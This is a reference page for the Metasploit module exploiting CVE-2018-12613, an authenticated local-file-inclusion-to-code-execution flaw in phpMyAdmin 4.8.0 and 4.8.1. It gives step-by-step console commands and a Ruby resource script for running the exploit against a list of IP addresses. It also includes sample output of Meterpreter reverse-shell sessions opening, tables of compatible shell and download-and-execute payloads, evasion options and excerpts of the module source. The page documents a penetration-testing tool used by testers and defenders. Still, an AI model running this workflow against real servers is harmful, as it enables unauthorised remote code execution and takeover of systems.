phpMyAdmin Authenticated Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/multi/http/phpmyadmin_lfi_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: phpMyAdmin Authenticated Remote Code Execution
Module: exploit/multi/http/phpmyadmin_lfi_rce
Source code: modules/exploits/multi/http/phpmyadmin_lfi_rce.rb
Disclosure date: 2018-06-19
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2018-12613

phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Basic Usage


Using phpmyadmin_lfi_rce against a single host

Normally, you can use exploit/multi/http/phpmyadmin_lfi_rce this way:

msf > use exploit/multi/http/phpmyadmin_lfi_rce
msf exploit(phpmyadmin_lfi_rce) > show targets
    ... a list of targets ...
msf exploit(phpmyadmin_lfi_rce) > set TARGET target-id
msf exploit(phpmyadmin_lfi_rce) > show options
    ... show and set options ...
msf exploit(phpmyadmin_lfi_rce) > exploit

Using phpmyadmin_lfi_rce against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your phpmyadmin_lfi_rce will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/multi/http/phpmyadmin_lfi_rce")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, which can be exploited post-authentication to execute PHP code by application. The module has been tested with phpMyAdmin v4.8.1.

Vulnerable Application


phpMyAdmin v4.8.1 and v4.8.0

Verification Steps


  1. ./msfconsole -q
  2. use exploit/multi/http/phpmyadmin_lfi_rce
  3. set rhosts <rhost>
  4. run

Scenarios


Tested on Windows 7 x64 using PHP 7.2.4 and phpMyAdmin 4.8.1

msf5 > use exploit/multi/http/phpmyadmin_lfi_rce
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > set rhosts 172.22.222.122
rhosts => 172.22.222.122
msf5 exploit(multi/http/phpmyadmin_lfi_rce) > run

[*] Started reverse TCP handler on 172.22.222.190:4444
[*] Sending stage (37775 bytes) to 172.22.222.122
[*] Meterpreter session 1 opened (172.22.222.190:4444 -> 172.22.222.122:51999) at 2018-07-05 13:14:39 -0500

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer    :
OS          : Windows NT 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >

Go back to menu.

Msfconsole Usage


Here is how the multi/http/phpmyadmin_lfi_rce exploit module looks in the msfconsole:

msf6 > use exploit/multi/http/phpmyadmin_lfi_rce

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show info

       Name: phpMyAdmin Authenticated Remote Code Execution
     Module: exploit/multi/http/phpmyadmin_lfi_rce
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2018-06-19

Provided by:
  ChaMd5
  Henry Huang
  Jacob Robles

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows
  2   Linux

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    no        Password to authenticate with
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /phpmyadmin/     yes       Base phpMyAdmin directory path
  USERNAME   root             yes       Username to authenticate with
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  phpMyAdmin v4.8.0 and v4.8.1 are vulnerable to local file inclusion, 
  which can be exploited post-authentication to execute PHP code by 
  application. The module has been tested with phpMyAdmin v4.8.1.

References:
  http://www.securityfocus.com/bid/104532
  https://nvd.nist.gov/vuln/detail/CVE-2018-12613
  https://cwe.mitre.org/data/definitions/661.html
  https://www.phpmyadmin.net/security/PMASA-2018-4/
  https://www.secpulse.com/archives/72817.html
  https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

Module Options


This is a complete list of options available in the multi/http/phpmyadmin_lfi_rce exploit:

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /phpmyadmin/     yes       Base phpMyAdmin directory path
   USERNAME   root             yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the multi/http/phpmyadmin_lfi_rce exploit:

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show advanced

Module advanced options (exploit/multi/http/phpmyadmin_lfi_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/http/phpmyadmin_lfi_rce module can exploit:

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows
   2   Linux

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/phpmyadmin_lfi_rce exploit:

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the multi/http/phpmyadmin_lfi_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Unable to connect to server


Here is a relevant code snippet related to the "<PEER> - Unable to connect to server" error message:

54:	
55:	  def check
56:	    begin
57:	      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
58:	    rescue
59:	      vprint_error("#{peer} - Unable to connect to server")
60:	      return Exploit::CheckCode::Unknown
61:	    end
62:	
63:	    if res.nil? || res.code != 200
64:	      vprint_error("#{peer} - Unable to query /js/messages.php")

<PEER> - Unable to query /js/messages.php


Here is a relevant code snippet related to the "<PEER> - Unable to query /js/messages.php" error message:

59:	      vprint_error("#{peer} - Unable to connect to server")
60:	      return Exploit::CheckCode::Unknown
61:	    end
62:	
63:	    if res.nil? || res.code != 200
64:	      vprint_error("#{peer} - Unable to query /js/messages.php")
65:	      return Exploit::CheckCode::Unknown
66:	    end
67:	
68:	    # v4.8.0 || 4.8.1 phpMyAdmin
69:	    if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

105:	    })
106:	  end
107:	
108:	  def exploit
109:	    unless check == Exploit::CheckCode::Appears
110:	      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
111:	    end
112:	
113:	    uri = target_uri.path
114:	    vprint_status("#{peer} - Grabbing CSRF token...")
115:	

<PEER> - Failed to retrieve webpage grabbing CSRF token


Here is a relevant code snippet related to the "<PEER> - Failed to retrieve webpage grabbing CSRF token" error message:

114:	    vprint_status("#{peer} - Grabbing CSRF token...")
115:	
116:	    response = send_request_cgi({'uri' => uri})
117:	
118:	    if response.nil?
119:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
120:	    elsif response.body !~ /token"\s*value="(.*?)"/
121:	      fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
122:	    end
123:	    token = Rex::Text.html_decode($1)
124:	

<PEER> - Couldn't find token. Is URI set correctly?


Here is a relevant code snippet related to the "<PEER> - Couldn't find token. Is URI set correctly?" error message:

116:	    response = send_request_cgi({'uri' => uri})
117:	
118:	    if response.nil?
119:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token")
120:	    elsif response.body !~ /token"\s*value="(.*?)"/
121:	      fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
122:	    end
123:	    token = Rex::Text.html_decode($1)
124:	
125:	    if target.name =~ /Automatic/
126:	      /\((?<srv>Win.*)?\)/ =~ response.headers['Server']

<PEER> - Failed to retrieve webpage


Here is a relevant code snippet related to the "<PEER> - Failed to retrieve webpage" error message:

149:	        'pma_password' => datastore['PASSWORD']
150:	      }
151:	    })
152:	
153:	    if login.nil? || login.code != 302
154:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
155:	    end
156:	
157:	    #Ignore the first cookie
158:	    cookies = login.get_cookies
159:	    cookies = cookies.split[1..-1].join(' ')

<PEER> - Failed to retrieve webpage


Here is a relevant code snippet related to the "<PEER> - Failed to retrieve webpage" error message:

164:	      'vars_get' => { 'token' => token },
165:	      'cookie' => cookies
166:	    })
167:	
168:	    if login_check.nil?
169:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
170:	    elsif login_check.body.include? 'Welcome to'
171:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
172:	    elsif login_check.body !~ /token"\s*value="(.*?)"/
173:	      fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
174:	    end

<PEER> - Authentication failed


Here is a relevant code snippet related to the "<PEER> - Authentication failed" error message:

166:	    })
167:	
168:	    if login_check.nil?
169:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
170:	    elsif login_check.body.include? 'Welcome to'
171:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
172:	    elsif login_check.body !~ /token"\s*value="(.*?)"/
173:	      fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
174:	    end
175:	    token = Rex::Text.html_decode($1)
176:	

<PEER> - Couldn't find token. Is URI set correctly?


Here is a relevant code snippet related to the "<PEER> - Couldn't find token. Is URI set correctly?" error message:

168:	    if login_check.nil?
169:	      fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage")
170:	    elsif login_check.body.include? 'Welcome to'
171:	      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
172:	    elsif login_check.body !~ /token"\s*value="(.*?)"/
173:	      fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?")
174:	    end
175:	    token = Rex::Text.html_decode($1)
176:	
177:	    vprint_status("#{peer} - Authentication successful")
178:	

<PEER> - Failed to create database


Here is a relevant code snippet related to the "<PEER> - Failed to create database" error message:

190:	    dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";'
191:	
192:	    #Create database
193:	    res = query(uri, dbsql, cookies, token)
194:	    if res.nil? || res.code != 200
195:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database")
196:	    end
197:	
198:	    #Create table and column
199:	    res = query(uri, tablesql, cookies, token)
200:	    if res.nil? || res.code != 200

<PEER> - Failed to create table


Here is a relevant code snippet related to the "<PEER> - Failed to create table" error message:

196:	    end
197:	
198:	    #Create table and column
199:	    res = query(uri, tablesql, cookies, token)
200:	    if res.nil? || res.code != 200
201:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table")
202:	    end
203:	
204:	    #Find datadir
205:	    res = query(uri, dirsql, cookies, token)
206:	    if res.nil? || res.code != 200

<PEER> - Failed to find data directory


Here is a relevant code snippet related to the "<PEER> - Failed to find data directory" error message:

202:	    end
203:	
204:	    #Find datadir
205:	    res = query(uri, dirsql, cookies, token)
206:	    if res.nil? || res.code != 200
207:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
208:	    end
209:	
210:	    unless res.body =~ /^<td data.*?>(.*)?</
211:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
212:	    end

<PEER> - Failed to find data directory


Here is a relevant code snippet related to the "<PEER> - Failed to find data directory" error message:

206:	    if res.nil? || res.code != 200
207:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
208:	    end
209:	
210:	    unless res.body =~ /^<td data.*?>(.*)?</
211:	      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory")
212:	    end
213:	
214:	    paths = []
215:	    #Creating include path
216:	    if mytarget == 'Windows'

<PEER> - Failed to drop database <DATABASE>. Might drop when your session closes.


Here is a relevant code snippet related to the "<PEER> - Failed to drop database <DATABASE>. Might drop when your session closes." error message:

227:	    end
228:	
229:	    paths.each {|data_path| lfi(uri, data_path, cookies, token)}
230:	
231:	    #Drop database
232:	    res = query(uri, dropsql, cookies, token)
233:	    if res.nil? || res.code != 200
234:	      print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.")
235:	    end
236:	  end
237:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • ChaMd5
  • Henry Huang
  • Jacob Robles

Version


This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.